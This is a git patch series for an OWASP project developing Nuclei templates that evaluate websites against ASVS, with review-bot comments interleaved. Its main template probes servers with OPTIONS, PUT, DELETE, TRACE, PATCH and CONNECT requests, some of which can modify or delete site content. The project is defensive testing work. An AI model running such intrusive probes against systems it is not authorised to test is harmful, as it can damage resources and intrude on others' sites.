From b81baa1b790ad66e05b7bc1cb78f8c2ac7378516 Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Wed, 24 May 2023 17:37:35 +0330 Subject: [PATCH 001/129] Update info.md update small details in side bar --- info.md | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/info.md b/info.md index 60950a4..35d4f69 100644 --- a/info.md +++ b/info.md @@ -1,13 +1,11 @@ ### ASVS Security Evaluation Templates with Nuclei Information * [Incubator Project](#) -* [Type of Project](#) * [Version 0.0.0](#) -* [Builder](#) +* [Defender](#) * [Breaker](#) -### Downloads or Social Links -* [Download](#) -* [Meetup](#) +### Community +* [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) ### Code Repository * [repo](#) From 3439610a0b40cc6a48e1272b2a14f08d8c1248ef Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 07:37:44 +0330 Subject: [PATCH 002/129] Update index.md add Licensing section --- index.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/index.md b/index.md index 6992855..79c808c 100644 --- a/index.md +++ b/index.md @@ -20,3 +20,7 @@ tags: This is a space-delimited list of tags you associate with your project or level: For projects, this is your project level (2 - Incubator, 3 - Lab, 3.5 - Production, 4 - Flagship) type: code, tool, documentation, or other +Licensing +https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei + +This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From 9c70535ef4d5e0d1271fe45a674b5583dcdc025e Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 07:59:31 +0330 Subject: [PATCH 003/129] Update index.md --- index.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) 
diff --git a/index.md b/index.md index 79c808c..e299832 100644 --- a/index.md +++ b/index.md @@ -20,7 +20,10 @@ tags: This is a space-delimited list of tags you associate with your project or level: For projects, this is your project level (2 - Incubator, 3 - Lab, 3.5 - Production, 4 - Flagship) type: code, tool, documentation, or other -Licensing -https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei + + + +## header H2 +[](https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From a92a1a729a3e70df6eefc12e365d73854893be26 Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 08:00:36 +0330 Subject: [PATCH 004/129] Update index.md --- index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.md b/index.md index e299832..841704a 100644 --- a/index.md +++ b/index.md @@ -23,7 +23,7 @@ type: code, tool, documentation, or other -## header H2 +## Licensing [](https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From 378ce1521394e9bcfb2ce1dc6f0153c3d8870c0f Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 08:25:43 +0330 Subject: [PATCH 005/129] Update info.md add link to the github repo --- info.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/info.md b/info.md index 35d4f69..0338027 100644 --- a/info.md +++ b/info.md 
@@ -4,11 +4,17 @@ * [Defender](#) * [Breaker](#) +### Classification +* Tool + ### Community * [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) +### Statistics +* [Daily Project Stats](#) + ### Code Repository -* [repo](#) +* [repo](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) ### Change Log * [changes](#) From 05b697058d978b039ba3fac3a94d9ced8121a03f Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 09:00:22 +0330 Subject: [PATCH 006/129] Create README.md --- README.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/README.md @@ -0,0 +1 @@ + From fc61924d00ae35eb7ad0f4d773b4eb10466c4362 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 28 May 2023 09:37:57 +0330 Subject: [PATCH 007/129] Create MIT LICENSE --- LICENSE | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 LICENSE diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..636d84b --- /dev/null +++ b/LICENSE 
@@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2023 OWASP + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. From bdbca99f8907143d16e55e6b650dff28d97e21b9 Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Mon, 29 May 2023 07:59:43 +0330 Subject: [PATCH 008/129] Update index.md Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.md b/index.md index 841704a..e433e37 100644 --- a/index.md +++ b/index.md 
@@ -24,6 +24,6 @@ type: code, tool, documentation, or other ## Licensing -[](https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) +[![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From 0588e75d2775c10289d0b3d75bd54870165212ca Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 12:58:32 +0330 Subject: [PATCH 009/129] Update index.md add project desc Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- index.md | 20 +++++--------------- 1 file changed, 5 insertions(+), 15 deletions(-) diff --git a/index.md b/index.md index e433e37..2f02e06 100644 --- a/index.md +++ b/index.md 
@@ -2,26 +2,16 @@ layout: col-sidebar title: OWASP ASVS Security Evaluation Templates with Nuclei -tags: example-tag +tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity level: 2 -type: -pitch: A very brief, one-line description of your project +type: tool +pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites. --- -This is an example of a Project or Chapter Page. Please change these items to indicate the actual information you wish to present. In addition to this information, the 'front-matter' above this text should be modified to reflect your actual information. An explanation of each of the front-matter items is below: - -layout: This is the layout used by project and chapter pages. You should leave this value as col-sidebar - -title: This is the title of your project or chapter page, usually the name. For example, OWASP Zed Attack Proxy or OWASP Baltimore - -tags: This is a space-delimited list of tags you associate with your project or chapter. If you are using tabs, at least one of these tags should be unique in order to be used in the tabs files (an example tab is included in this repo) - -level: For projects, this is your project level (2 - Incubator, 3 - Lab, 3.5 - Production, 4 - Flagship) - -type: code, tool, documentation, or other - +This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. The templates and user interface will be tested for accuracy and usability, and once finalized, they will be made available for use. 
User feedback and usage of the templates and user interface will be monitored and analyzed, and updates will be made to the templates and user interface based on this feedback and usage. Finally, the project will be documented for future reference. +It's important to note that Since the implementation methods and frameworks used in web application design are very diverse, in this project, we will consider the existing best practice designs and develop nuclei templates based on them. ## Licensing [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) From 2ec85db9e4639a01b8cf6c9bc77e34225b65025f Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 15:05:54 +0330 Subject: [PATCH 010/129] Create CONTRIBUTING.md add 'how to contribute' file Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- CONTRIBUTING.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 CONTRIBUTING.md diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..526ffda --- /dev/null +++ b/CONTRIBUTING.md 
@@ -0,0 +1,16 @@ + +## Contributing + +If you have any idea to improve templates or want to share experience and give feedback on this project, we'd love to hear from you in following ways: + + +### Asking Questions +You can use either Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43) to ask questions. + +### Create issues + +Before raising pull requests, please create an [Issue](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/issues) first to be discussed for missing requirements, content or errors. Please explain the issue in detail including references if available and suggest where it could be added. + +### Open a Pull Request +- Your pull request may be merged after review. +- Commits must be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) to indicate agreement with [Developer Certificate of Origin (DCO)](https://developercertificate.org/). From bbe49f8b39543f3a3ed98ec7688520d7a0d09dde Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 15:12:25 +0330 Subject: [PATCH 011/129] Update and rename tab_example.md to tab_contributing.md add contribution guideline on main owasp website of project Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- tab_contributing.md | 21 +++++++++++++++++++++ tab_example.md | 11 ----------- 2 files changed, 21 insertions(+), 11 deletions(-) create mode 100644 tab_contributing.md delete mode 100644 tab_example.md diff --git a/tab_contributing.md b/tab_contributing.md new file mode 100644 index 0000000..2a82cf5 --- /dev/null +++ b/tab_contributing.md 
@@ -0,0 +1,21 @@ +--- +title: Contributing +layout: null +tab: true +order: 1 +tags: asvs-security-evaluation-templates-with-nuclei +--- + +## Contributing + +If you are interested in contributing to this project by sharing ideas to improve templates or giving feedback we will be happy to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). + +For detailed information and guidelines about contributing in "ASVS evaluation template development" please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md) + +### Core Team +The project current core team are: +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) +- [Mohammad Khodaiemehr](https://github.com/m0khd) +- [Amin Naserinia](https://github.com/aminnaseri) +- [Reza Saeedi](https://github.com/Reza-saeedi) +- [Dorna Azhirak](https://github.com/nameddorna) diff --git a/tab_example.md b/tab_example.md deleted file mode 100644 index d29bc45..0000000 --- a/tab_example.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Example -layout: null -tab: true -order: 1 -tags: example-tag ---- - -## Example - -Put whatever you like here: news, screenshots, features, supporters, or remove this file and don't use tabs at all. \ No newline at end of file From 37d3cc148903b6a0be67b5f87bc3f6927eb2699c Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 15:57:58 +0330 Subject: [PATCH 012/129] Update README.md add readme file content Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- README.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/README.md b/README.md index 8b13789..b22a866 100644 --- a/README.md +++ b/README.md 
@@ -1 +1,30 @@ +# OWASP ASVS Security Evaluation Templates with Nuclei + + +This project aims to develop [Nuclei](https://github.com/projectdiscovery/nuclei) templates for evaluating OWASP Application Security Verification Standard ([ASVS](https://owasp.org/www-project-application-security-verification-standard/)) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. + + The goal is to provide security professionals with an easy-to-use set of tools to test their web applications and identify potential vulnerabilities. +#### It's important to note that: +- Since the implementation methods and frameworks used in web application design are very diverse, in this project we will consider the existing best practice designs and develop nuclei templates based on them :) +- Also while these Nuclei templates are designed to help automate the process of evaluating web applications against ASVS requirements, they should not be considered a substitute for manual testing or other security best practices. +- Some templates are developed for a limited or specific scenario and should be modified and perfected according to the needs of the evaluator/user. + +## Licensing +[![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) + +This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. + +## Contributing + +Contributions to this repository are welcome and encouraged. 
If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). + +For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md) + +#### Core Team +The project current core team are: +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) +- [Mohammad Khodaiemehr](https://github.com/m0khd) +- [Amin Naserinia](https://github.com/aminnaseri) +- [Reza Saeedi](https://github.com/Reza-saeedi) +- [Dorna Azhirak](https://github.com/nameddorna) From 5a27a844901eb6c966aadbc7ea7c03c6c6477a2c Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sat, 17 Jun 2023 08:51:50 +0330 Subject: [PATCH 013/129] Update info.md edit sidebar add icons Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- info.md | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/info.md b/info.md index 0338027..4abe302 100644 --- a/info.md +++ b/info.md @@ -1,11 +1,13 @@ -### ASVS Security Evaluation Templates with Nuclei Information +### Project Information * [Incubator Project](#) * [Version 0.0.0](#) -* [Defender](#) -* [Breaker](#) - + ### Classification -* Tool +* Tool + +### Audience +* Defender +* Breaker ### Community * [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) From 58f77bb738cb360354607b2ee7d759a7714ad071 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 14 Jul 2023 20:48:02 +0330 Subject: [PATCH 014/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) 
diff --git a/README.md b/README.md index b22a866..c714ebb 100644 --- a/README.md +++ b/README.md @@ -23,7 +23,6 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Mohammad Khodaiemehr](https://github.com/m0khd) - [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) - [Dorna Azhirak](https://github.com/nameddorna) From 86e0d5a93493874a4d673318de62429f4722fa77 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 17 Jul 2023 13:23:57 +0330 Subject: [PATCH 015/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index c714ebb..7037f89 100644 --- a/README.md +++ b/README.md @@ -25,5 +25,4 @@ The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) -- [Dorna Azhirak](https://github.com/nameddorna) From f1f8710ae9c0f2960c8ef08fd3ea638612439671 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 20 Jul 2023 16:20:29 +0330 Subject: [PATCH 016/129] Create syntax-checking.yml Signed-off-by: Hamed Salimian --- .github/workflows/syntax-checking.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 .github/workflows/syntax-checking.yml diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml new file mode 100644 index 0000000..d9fa932 --- /dev/null +++ b/.github/workflows/syntax-checking.yml 
@@ -0,0 +1,19 @@ +name: ❄️ YAML Lint + +on: + pull_request: + paths: + - '**.yaml' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Yamllint + uses: karancode/yamllint-github-action@v2.1.1 + with: + yamllint_config_filepath: .yamllint + yamllint_strict: false + yamllint_comment: true From 045c48c7eedea094ab107aa46c3ed5301e1789ee Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 20 Jul 2023 16:24:16 +0330 Subject: [PATCH 017/129] Create template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 .github/workflows/template-validate.yml diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml new file mode 100644 index 0000000..6c80cd8 --- /dev/null +++ b/.github/workflows/template-validate.yml @@ -0,0 +1,29 @@ +name: 🛠 Template Validate + +on: + pull_request: + paths: + - '**.yaml' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + + - name: Set up Go + uses: actions/setup-go@v4 + with: + go-version: 1.20.x + + - name: nuclei install + run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest + + - name: Template Validation + run: | + cp -r ${{ github.workspace }} $HOME + nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -w ./workflows -allow-local-file-access From 7d5736ff5b4cdc450cc4cdd5d5ea2fea778202e3 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 22 Jul 2023 08:28:01 +0330 Subject: [PATCH 018/129] Create templates folder Signed-off-by: Hamed Salimian --- templates/.gitkeep | 1 + 1 file changed, 1 insertion(+) create mode 100644 templates/.gitkeep diff --git a/templates/.gitkeep b/templates/.gitkeep new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/templates/.gitkeep @@ -0,0 +1 @@ + 
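Review bot: `.github/workflows/syntax-checking.yml` points `yamllint_config_filepath` at `.yamllint`, but no such file exists in the repository at this point in the series (it only arrives later), so the first runs lint with whatever the action falls back to; land the config in the same change. `karancode/yamllint-github-action@v2.1.1` is a third-party action referenced by a mutable tag, and `actions/checkout@v2` is used here while `template-validate.yml` uses `@v3`; pin both to a full commit SHA (and align the checkout version) so a moved tag cannot change what executes with the repository token.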
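Review bot: in `.github/workflows/template-validate.yml` the `cp -r ${{ github.workspace }} $HOME` step has no visible consumer, since both `nuclei -duc -validate` invocations run in the checkout directory, and `-w ./workflows` names a directory this series never creates, so the second command will either error or validate nothing; drop the copy and the `-w` run until a `workflows/` directory exists. `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest` makes the validation result depend on whichever nuclei release is current on the day the job runs; pin a version so a template that validated yesterday does not fail a PR today. `-allow-local-file-access` widens what templates may read during validation and is only warranted if a template actually does so.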
From 33deafcfcdf1bff5b3f20021b506d76d5ecb9499 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 22 Jul 2023 08:55:00 +0330 Subject: [PATCH 019/129] Added static vulnerable project as submodule on dev --- .gitmodules | 4 ++++ Vulnerable-Pages | 1 + 2 files changed, 5 insertions(+) create mode 100644 .gitmodules create mode 160000 Vulnerable-Pages diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000..18feab8 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,4 @@ +[submodule "Vulnerable-Pages"] + path = Vulnerable-Pages + url = https://github.com/Snbig/Vulnerable-Pages + branch = dev diff --git a/Vulnerable-Pages b/Vulnerable-Pages new file mode 160000 index 0000000..982975c --- /dev/null +++ b/Vulnerable-Pages @@ -0,0 +1 @@ +Subproject commit 982975c8775116be62cd507660d125e888f17b4a From efe4816307f92a049ca0b57643e8552f27e870a5 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:41:33 +0330 Subject: [PATCH 020/129] Create 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 170 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 170 insertions(+) create mode 100644 templates/13.2.1.yaml diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml new file mode 100644 index 0000000..f0194d3 --- /dev/null +++ b/templates/13.2.1.yaml 
@@ -0,0 +1,170 @@ +id: asvs_13_2_1 + +info: + name: ASVS 13.2.1 Check + author: Hamed Salimian + severity: high + classification: + cwe-id: CWE-650 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://nmap.org/nsedoc/scripts/http-methods.html + tags: asvs,13.2.1 + description: | + Verify that enabled RESTful HTTP methods are a valid choice for the user or action, such as preventing normal users using DELETE or PUT on protected API or resources. + +http: + - method: OPTIONS + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: regex + name: "potentially risky methods (OPTIONS check)" + part: header + regex: + - "(PUT|DELETE|TRACE|PATCH|CONNECT)" + - type: kval + name: "Access-Control-Allow-Methods" + part: header + kval: + - Access_Control_Allow_Methods + matchers: + - type: regex + part: header + regex: + - "(PUT|DELETE|TRACE|PATCH|CONNECT)" + + - raw: + - | + {{to_upper(rand_text_alpha(4))}} {{Path}} HTTP/1.1 + Host: {{Hostname}} + Cookie: {{Cookie}} + extractors: + - type: dsl + internal: true + name: rand_resp + dsl: + - status_code + + - method: PUT + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + body: "HTTP PUT Method is Enabled" + extractors: + - type: dsl + name: "PUT method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + dsl: + - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" + + - method: DELETE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: dsl + name: "DELETE method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - 
"(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + + - method: TRACE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: dsl + name: "TRACE method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - type: regex + part: body + regex: + - '^TRACE \S+ HTTP\/[0-9]\.[0-9]' + + - method: PATCH + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + body: "" + extractors: + - type: dsl + name: "PATCH method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + + - method: CONNECT + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: dsl + name: "CONNECT method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" From 037be1df9221c9b0ef499b502b15b4aa218db9ea Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:48:20 +0330 Subject: [PATCH 021/129] Update syntax-checking.yml Add PUSH event to workflow Signed-off-by: Hamed Salimian --- .github/workflows/syntax-checking.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index d9fa932..f641b2a 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -1,6 +1,7 @@ name: ❄️ YAML Lint -on: +on: + push: pull_request: paths: - '**.yaml' 
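Review bot: `.gitmodules` tracks `branch = dev` of `Snbig/Vulnerable-Pages`, a personal GitHub account rather than an OWASP organisation repository; the gitlink pins commit 982975c so a plain checkout is reproducible, but `branch = dev` means `git submodule update --remote` silently advances to whatever `dev` points at. Since the commit message describes it as a vulnerable project, the README should state that the submodule is a test fixture for the templates and is not to be deployed outside an isolated lab.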
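Review bot: in `templates/13.2.1.yaml` the `Cookie: "{{Cookie}}"` header uses a variable that the template never defines (there is no `variables:` block), so unless the user passes `-var Cookie=...` nuclei will flag `Cookie` as unresolved; add a `variables:` default or document the required flag in `description`. The PUT request sends a real body (`body: "HTTP PUT Method is Enabled"`) and the DELETE request targets `{{BaseURL}}` itself, so a server that honours these methods may create, overwrite or remove the resource at the site root during an evaluation run; say in the description that the check is intrusive and aim it at a dedicated test path. The DELETE, PATCH and CONNECT matchers accept any status below 400 that differs from `rand_resp` (`negative: true` on `(status_code < 600 && status_code >= 400) || (rand_resp == status_code)`), so a blanket 3xx redirect, for example to HTTPS or to a trailing slash, is reported as the method being enabled; use the 2xx window the PUT check already has, or set `redirects: true`. The OPTIONS extractor and matcher regex `(PUT|DELETE|TRACE|PATCH|CONNECT)` runs over the whole header block without word boundaries; restricting it to the `Allow:` and `Access-Control-Allow-Methods:` header values avoids matching those tokens inside unrelated headers.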
From 9c7ae76c2ae54f1cbe7c55a703870f3869977442 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:48:49 +0330 Subject: [PATCH 022/129] Update 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index f0194d3..8f1cc9e 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -168,3 +168,4 @@ http: negative: true dsl: - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + From 83a42b3b3dae885c883f5fc872cc53bdeb648458 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:53:16 +0330 Subject: [PATCH 023/129] Create .yamllint Signed-off-by: Hamed Salimian --- .yamllint | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 .yamllint diff --git a/.yamllint b/.yamllint new file mode 100644 index 0000000..8d5ac48 --- /dev/null +++ b/.yamllint @@ -0,0 +1,25 @@ +--- +extends: default + +ignore: | + .pre-commit-config.yml + .github/ + .git/ + *.yml + +rules: + document-start: disable + line-length: disable + new-lines: disable + new-line-at-end-of-file: disable + truthy: disable + comments: + require-starting-space: true + ignore-shebangs: true + min-spaces-from-content: 1 + empty-lines: + max: 5 + braces: + forbid: true + brackets: + forbid: true From 4023e9b70a1e7c43dad2d9a7d2a6a0e7517cbe3c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:55:27 +0330 Subject: [PATCH 024/129] Update template-validate.yml add PUSH event to workflow Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 6c80cd8..0b29477 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -1,6 +1,7 @@ name: 🛠 Template Validate on: + push: pull_request: paths: - '**.yaml' 
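Review bot: in `.yamllint` the `ignore` list excludes `.github/` and `*.yml`, so the workflow files are never linted, which is consistent with the lint job only triggering on `**.yaml` but should be a deliberate choice; `braces: forbid: true` and `brackets: forbid: true` reject flow-style `{...}` and `[...]` values such as an inline `tags` list, which CONTRIBUTING.md should state so contributors know to use block style, and `empty-lines: max: 5` is loose for template files.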
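Review bot: adding `push:` above `pull_request:` in `template-validate.yml` (and the same change to `syntax-checking.yml` in PATCH 021) triggers the job on every push regardless of the files touched, because the `paths: - '**.yaml'` filter is nested under `pull_request:` only; give `push:` its own `paths:` filter, and expect branch pushes that also have an open pull request to run the job twice.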
